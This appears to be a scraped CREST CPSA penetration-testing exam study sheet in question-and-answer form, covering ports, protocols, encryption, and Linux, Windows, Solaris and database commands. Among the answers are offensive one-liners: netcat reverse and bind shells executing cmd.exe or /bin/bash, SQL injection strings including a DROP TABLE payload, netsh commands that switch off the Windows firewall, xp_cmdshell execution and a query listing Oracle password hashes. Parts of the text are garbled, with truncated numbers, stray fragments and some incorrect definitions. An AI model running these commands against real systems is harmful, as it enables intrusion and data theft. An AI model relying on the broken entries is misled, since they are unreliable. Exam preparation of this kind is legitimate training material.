Network Protocols and Security Concepts, Exams of Network security

This document covers a wide range of network protocols, security concepts, and related topics. It provides detailed information on various network ports, protocols, encryption algorithms, file permissions, operating system versions, and more. The document serves as a comprehensive reference for network and security professionals, covering topics such as POP3, RPC, NTP, SMB, IRC, encryption algorithms, SQL injections, Linux commands, and network interface cards. It also includes information on relevant security standards, regulations, and best practices. The depth and breadth of the content make this document a valuable resource for understanding fundamental network and security principles.

Typology: Exams

2024/2025

Available from 10/28/2024

nancy-kimani

CREST CPSA QUESTIONS AND ANSWERS
TCP - ANSWER-Transmission Control Protocol
UDP - ANSWER-User Datagram Protocol
Port 21 - ANSWER-FTP
FTP - ANSWER-File Transfer Protocol
Port 22 - ANSWER-SSH
SSH - ANSWER-Secure Shell
Port 23 - ANSWER-Telnet
Port 25 - ANSWER-SMTP
SMTP - ANSWER-Simple Mail Transfer Protocol
Port 49 - ANSWER-TACACS
TACACS - ANSWER-Terminal Access Controller Access Control System
Port 53 - ANSWER-DNS
DNS - ANSWER-Domain Name System
Port 67 (UDP) - ANSWER-DHCP (Server)
Port 68 (UDP) - ANSWER-DHCP (Client)
DHCP - ANSWER-Dynamic Host Configuration Protocol
Port 69 (UDP) - ANSWER-TFTP
TFTP - ANSWER-Trivial File Transfer Protocol
Port 80 - ANSWER-HTTP
HTTP - ANSWER-Hypertext Transfer Protocol
Port 88 - ANSWER-Kerberos
Kerberos - ANSWER-A computer network authentication protocol that works on the basis of tickets to allow nodes communicating over a non-secure network to prove their identity to one another in a secure manner
Port 110 - ANSWER-POP
POP3 - ANSWER-Post Office Protocol version 3
Port 111 - ANSWER-RPC
RPC - ANSWER-Remote Procedure Call
Port 123 - ANSWER-NTP
NTP - ANSWER-Network Time Protocol
Port 135 - ANSWER-Windows RPC (EPM)
Port 593 - ANSWER-RPC over HTTPS
Port 445 - ANSWER-SMB
SMB - ANSWER-Server Message Block
Port 137 (UDP) - ANSWER-NetBIOS (name services)
Port 138 (UDP) - ANSWER-NetBIOS (datagram services)
Port 139 - ANSWER-NetBIOS (session services)
NetBIOS - ANSWER-Network Basic Input/Output System
Port 143 - ANSWER-IMAP
IMAP - ANSWER-Internet Message Access Protocol
Port 161 (UDP) - ANSWER-SNMP
SNMP - ANSWER-Simple Network Management Protocol
Port 179 - ANSWER-BGP
BGP - ANSWER-Border Gateway Protocol

Port 2049 - ANSWER-NFS
NFS - ANSWER-Network File System
Port 3128 - ANSWER-Squid Proxy
Port 3306 - ANSWER-MySQL
Port 3389 - ANSWER-RDP (Remote Desktop Protocol)
Port 5060 - ANSWER-SIP
SIP - ANSWER-Session Initiation Protocol
Port 5222 - ANSWER-Jabber
Port 5432 - ANSWER-Postgres
Port 5666 - ANSWER-Nagios
Postgres - ANSWER-An object-relational database management system with an emphasis on extensibility and standards compliance
Nagios - ANSWER-Open source system monitoring service
Port 5900 - ANSWER-VNC
VNC - ANSWER-Virtual Network Computing
Port 6000 - ANSWER-X
X11 - ANSWER-A windowing system for bitmap displays, common on Unix-like operating systems. Provides the basic framework for a GUI environment: drawing and moving windows on the display device and interacting with a mouse and keyboard.
Port 6129 - ANSWER-DameWare
DameWare - ANSWER-Remote Access Software on port 6129
Port 6667 - ANSWER-IRC (Internet Relay Chat)
Port 9001 - ANSWER-Tor
Port 9001 - ANSWER-HSQL
Port 9090 - ANSWER-Openfire

Port 9100 - ANSWER-Jet Direct
Yersinia - ANSWER-Layer 2 testing tool (STP, CDP, VLAN Trunking, etc)
STP - ANSWER-Spanning Tree Protocol
CDP - ANSWER-Cisco Discovery Protocol
DTP - ANSWER-Dynamic Trunking Protocol
HSRP - ANSWER-Hot Standby Router Protocol
VTP - ANSWER-VLAN Trunking Protocol
fgdump - ANSWER-A utility for dumping passwords on Windows NT/2000/XP/2003 machines
Reserved Internal IPs - ANSWER-
  10.0.0.0/8 (10.0.0.0-10.255.255.255) : Private
  127.0.0.0/8 (127.0.0.0-127.255.255.255) : Local Host Loopback
  172.16.0.0/12 (172.16.0.0-172.31.255.255) : Private
  192.168.0.0/16 (192.168.0.0-192.168.255.255) : Private
Symmetric Encryption - ANSWER-
  DES/3DES
  AES
  Twofish
  Blowfish
  Serpent
  IDEA
  RC4, RC5, RC6
  CAST
Asymmetric Encryption - ANSWER-
  RSA
  El Gamal
  ECC
  Elliptic Curve Diffie-Hellman (Key Exchange)
  Paillier
  Merkle-Hellman
  Cramer-Shoup
Hashes - ANSWER-
  MD5
  SHA
  MySQL < 4.

' OR '1' =

' OR '1' =

SUBSCRIBE

NOTIFY

PUBLISH

INFO

REFER

MESSAGE

UPDATE

SMTP Requests - ANSWER-
  MAIL
  RCPT
  DATA
SNMP Requests - ANSWER-
  Get
  GetNext
  Set
  GetBulk
  Response
  Trap
  Inform
HTTP Status Codes - ANSWER-
  1xx - Info
  2xx - Success
  3xx - Redirection
  4xx - Error
  5xx - Server Error
HTTP Status Code 404 - ANSWER-NOT FOUND the method is not available
HTTP Status Code 301 - ANSWER-Moved Permanently
HTTP Status Code 302 - ANSWER-Temporarily Moved
HTTP Status Code 410 - ANSWER-Gone
SQL Injections (Escape Characters) - ANSWER-' OR '1' = '1' --
SQL Injections (Type Handling) - ANSWER-1;DROP TABLE users
Linux File Permissions - ANSWER-
  drwxrwxrwx 2 user(owner) group size date filename
  d | rwx | rwx | rwx
  Filetype | User | Group | Everyone
Linux Command : Change Password - ANSWER-passwd

Linux Command : Find Files of Type - ANSWER-
  find . -type f -iname '*.pdf'
  locate '*.pdf'
Linux File System Structure - ANSWER-
  /bin - User Binaries
  /boot - Bootup related files
  /dev - Interface for system devices
  /etc - System Config Files
  /home - Base directory for user files
  /lib - Critical software libraries
  /opt - Third party software
  /proc - System and running processes
  /root - Home for root
  /sbin - Sys Admin binaries
  /tmp - Temporary Files
  /usr - Less critical files
  /var - Variable system files
IPTables - ANSWER-A user-space utility program that allows a system administrator to configure the tables provided by the Linux kernel firewall and the chains and rules it stores
Wireshark and TCPdump - ANSWER-Common packet analyzers. Allows the user to display TCP/IP and other packets being transmitted or received over a network to which the computer is attached
pfSense - ANSWER-Open source firewall/router computer software distribution based on FreeBSD
Solaris Command : Process Listing - ANSWER-prstat -a
Solaris Command : Services and Status - ANSWER-svcs -a
Solaris Command: Start Service (Admin) - ANSWER-svcadm start
NT 3.1 Versions - ANSWER-Windows NT 3.1 (All)
NT 3.5 Versions - ANSWER-Windows NT 3.5 (All)
NT 3.51 Versions - ANSWER-Windows NT 3.51 (All)
NT 4.0 Versions - ANSWER-Windows NT 4.0 (All)
NT 5.0 Versions - ANSWER-Windows 2000 (All)

nslookup - ANSWER-A network administration command-line tool for querying the Domain Name System (DNS) to obtain domain name or IP address mapping or for any other specific DNS record.
IIS 1 Defaults - ANSWER-Windows NT Addon
IIS 2 Defaults - ANSWER-NT 4.
IIS 3 Defaults - ANSWER-NT 4 Service Pack
IIS 4 Defaults - ANSWER-NT4 Option Pack
IIS 5 Defaults - ANSWER-Windows 2000
IIS 5.1 Defaults - ANSWER-Windows XP
IIS 6 Defaults - ANSWER-Windows Server 2003, Windows XP Pro
IIS 7 Defaults - ANSWER-Windows Vista, Server 2008
IIS 7.5 Defaults - ANSWER-Windows 7, 2008 R
IIS 8 Defaults - ANSWER-Windows Server 2012, Windows 8
IIS 8.5 Defaults - ANSWER-Windows Server 2012 R2, Windows 8.
IIS 10 v 1607 Defaults - ANSWER-Windows Server 2016, Windows 10 Anniversary Update
IIS 10 v 1709 Defaults - ANSWER-Windows 10 Fall Creators, v
IIS 10 v 1809 Defaults - ANSWER-Windows Server 2019, Windows 10 October Update
Windows Command : Disable Firewall - ANSWER-
  netsh advfirewall set currentprofile state off
  netsh advfirewall set allprofiles state off
Sysinternals Suite - ANSWER-A set of powerful Windows administration applications used to view, troubleshoot, and modify Windows functions
WMIC - ANSWER-Windows Management Instrumentation Command-Line
WMIC Command : Execute Process - ANSWER-wmic process call create "process_name"

WMIC Command : Uninstall Software - ANSWER-
  wmic product get name /value
  wmic product where name="XX" call uninstall /nointeractive
PCI Card Info Storage Common-Use - ANSWER-
  - Store card details (i.e. CC number, expiry) in encrypted form
  - Store cardholder details (name, address, contact details... i.e. PII) in a SEPARATE encrypted database with a unique reference identifier linking the two
  - DO NOT STORE sensitive data (i.e. CVV2, CVV or CID values)
Windows : Active Directory Default Location - ANSWER-
  C:\Windows\NTDS
  Ntds.dit is the physical storage file
Windows : Domain Common Folders - ANSWER-
  C:\Windows\SYSVOL
  Contains Group Policies, Login Scripts, Staging Folders, etc.
dsquery - ANSWER-Remote Server Administration Tools (RSAT) feature pack tool used to enumerate Windows Domain
Classful IP Range : Class A - ANSWER-
  128 Networks (2^7), 16,777, Addresses per network (2^24)
  Range : 0.0.0.0-127.0.0.
  Default Subnet Mask : 255.0.0.0
  CIDR Notation : /
Classful IP Range : Class B - ANSWER-
  16,384 Networks (2^14), 65, Addresses per network (2^16)
  Range : 128.0.0.0-191.255.0.
  Default Subnet Mask : 255.255.0.0
  CIDR Notation : /
Classful IP Range : Class C - ANSWER-
  2,097,152 Networks (2^21), 256 Addresses per network (2^8)
  Range : 192.0.0.0-223.255.255.
  Default Subnet Mask : 255.255.255.0
  CIDR Notation : /
Classful IP Range Calculation - ANSWER-If the first bit is a "0", it's a class A address (Half the address space has a "0" for the first bit, so this is why class A takes up half the address space.)

Windows: nc 10.0.0.1 1234 -e cmd.exe (-e is execute and is not always supported)
Netcat : Listen - ANSWER-nc -nlvp
Netcat : Transfer Text or Binary Files - ANSWER-
  Listener : nc -nlvp 4444 > incoming.exe
  Sender: nc -nv IP to send to 4444 < file
Netcat : Bind Shell - ANSWER-
  Listener: nc -nlvp 4444 -e cmd.exe (to set up cmd to run)
  Sender/"Talker": nc -nv IP to connect to 4444 (this will execute the cmd.exe and allow the "Talker" to connect to the host)
  Attacking Listener
Netcat : Reverse Shell - ANSWER-
  Listener: nc -nlvp 4444
  Sender: nc -nv IP to send to 4444 /bin/bash (sends shell!)
  Attacking Sender
NMap : Scan Types - ANSWER-
  -sP : ping scan
  -sS : syn scan ("half open" scan)
  -sT : connect scan (full TCP)
  -sU : UDP scan
  -sO : protocol scan
Port Count - ANSWER-65,536 (2^16) Ports. This applies to TCP AND UDP
NMap : Scan EVERY Port - ANSWER-
  TCP: nmap -p-
  UDP: nmap -sU -p-
NMap : Common Options - ANSWER-
  -p1-65535 : Ports
  -T[0-5] : "Scan Speed", can help hide you
  -n : No DNS Resolution
  -O : OS Detection
  -A : AGGRESSIVE
  -sV : Version Detection
  -PN : No Ping
  -6 : IPv6 Scan
  -oA : Output ALL types
NMap : DNS Reverse Lookup - ANSWER-nmap -R -sL --dns-servers
Hash Lengths - ANSWER-
  MD5 : 16 Bytes
  SHA-1 : 20 bytes
  SHA-256 : 32 Bytes
  SHA-512 : 64 Bytes
IIS - ANSWER-Microsoft Web Server
Apache / Tomcat - ANSWER-Apache Web Servers
GWS - ANSWER-Google Web Server
Websphere - ANSWER-IBM Web Server
Litespeed - ANSWER-LiteSpeed Tech Web Server
MS-SQL : DB Version - ANSWER-
  SELECT @@version
  EXEC xp_msver (detailed version info)
MS-SQL : Run OS Command - ANSWER-EXEC master..xp_cmdshell 'net user'
MS-SQL : SELECT commands - ANSWER-
  SELECT HOST_NAME( ) : Hostname and IP
  SELECT DB_NAME ( ) : Current DB
  SELECT name FROM master..sysdatabases; : List DBs
  SELECT user_name ( ) : Current user
  SELECT name FROM master..syslogins : List users
  SELECT name FROM master..sysobjects WHERE xtype='U'; : List Tables

Oracle : SELECT Commands - ANSWER-
  SELECT * FROM v$version; : DB Version (SELECT version FROM v$instance;)
  SELECT instance_name FROM v$instance : Current DB (SELECT name FROM v$database;)
  SELECT DISTINCT owner FROM all_tables; : List DBs
  SELECT user FROM dual; : Current User
  SELECT username FROM all_users ORDER BY username; : List users
  SELECT column_name FROM all_tab_columns; : List Columns
  SELECT table_name FROM all_tables; : List Tables
  SELECT name, password, astatus FROM sys.user$; : List password hashes
hosts.equiv (or .rhosts file) Structure - ANSWER-
  Allow any user to log in from any host:
  Allow any user from host with a matching local account to log in: host
  Allow any user from host to log in: host +
  Allow user from host to log in as any non-root user: host user
  Allow all users with matching local accounts from host to log in except for baduser: host -baduser host
  Deny all users from host: -host
  Allow all users with matching local accounts on all hosts in a netgroup: +@netgroup
  Disallow all users on all hosts in a netgroup: -@netgroup
  Allow all users in a netgroup to log in from host as any non-root user: host +@netgroup
  Allow all users with matching local accounts on all hosts in a netgroup except baduser: +@netgroup -baduser +@netgroup
Linux Shell Breakouts - ANSWER-
  python -c 'import pty;pty.spawn("/bin/bash")'
  echo os.system('/bin/bash')
  /bin/sh -i
Language Vulns : Java (OO) - ANSWER-Log Injection Deadlock Language-based Attacks
Language Vulns : C (Function) - ANSWER-Code Injection Buffer Overflow
Language Vulns : Objective-C (OO) - ANSWER-Code Insertion Malformation Race Conditions
Language Vulns : C++ (OO) - ANSWER-Race Conditions
Language Vulns: PHP - ANSWER-Incorrect Element Removal
NIC - ANSWER-Network Interface Card
Network Interface Card (NIC) - ANSWER-An expansion card that enables a computer to connect to other computers or to a cable modem to facilitate a high-speed Internet connection.
MAC - ANSWER-Media Access Control
NAT - ANSWER-Network Address Translation

FQDN - ANSWER-Fully Qualified Domain Name
IOC - ANSWER-Indications of Compromise
POC - ANSWER-Point of Contact Proof of Concept
SIEM - ANSWER-Security Information and Event Management
MBSA - ANSWER-Microsoft Baseline Security Analyzer
CAT5 - ANSWER-type of cable that has the ability to transfer information from one computer to another
Ethernet - ANSWER-a system for connecting a number of computer systems to form a local area network, with protocols to control the passing of information and to avoid simultaneous transmission by two or more systems.
Token Ring - ANSWER-A networking technology developed by IBM in the 1980s. It relies upon direct links between nodes and a ring topology, using tokens to allow nodes to transmit data.
APIPA - ANSWER-Automatic Private Internet Protocol Addressing
MTU - ANSWER-maximum transmission unit - The largest data unit a network (for example, Ethernet or token ring) will accept for transmission.
Unicast - ANSWER-a message that is sent from a single sender to a single recipient
Multicast - ANSWER-a form of transmission in which a message is delivered to a group of hosts
Router Protocol - ANSWER-a protocol used between routers so that they can learn routes to add to their routing tables.
Link State Routing - ANSWER-A routing method that floods routing information to all routers within a network to build and maintain a more complex network route database.
Distance Vector Routing - ANSWER-Each router passes a copy of its routing table to its adjacent neighbors. The neighbor adds the route to its own table, incrementing the metric to reflect the extra distance to the end network. The distance is given as a hop count; the vector component specifies the address of the next hop.

Hybrid Routing - ANSWER-Routing protocol that uses the attributes of both distance vector and link state
IGP - ANSWER-Interior Gateway Protocol
Interior Gateway Protocol (IGP) - ANSWER-A routing protocol that operates within an autonomous system, which is a network under a single administrative control. Includes IGRP, EGRP, RIP, OSPF, and EIGRP
EGP - ANSWER-Exterior Gateway Protocol
Exterior Gateway Protocol (EGP) - ANSWER-A routing protocol that operates between autonomous systems, which are networks under different administrative control. Border Gateway Protocol (BGP) is the only one in widespread use today.
IPv6 - ANSWER-A new protocol developed to replace IPv4, addressing the issue of IP address exhaustion. No broadcast, has Anycast instead. 128-bit in Hexadecimal
MAC Address - ANSWER-A Media Access Control address is a hardware address that uniquely identifies each node on a network. Traditional MAC addresses are 12-digit (6 bytes, or 48 bits) hexadecimal numbers.
Network Architectures - ANSWER-The design of a computer network; includes both physical and logical design.
10BaseT - ANSWER-LAN (Ethernet) 10 Mbps
100BaseT - ANSWER-"Fast Ethernet" 100 Mbps
1000BaseT - ANSWER-Gigabit Ethernet 1 GB
Wireless Network - ANSWER-Any type of computer network that is not connected by cables of any kind.

Shared Media LAN - ANSWER-LAN that shares total bandwidth with all stations (ex. Token Ring)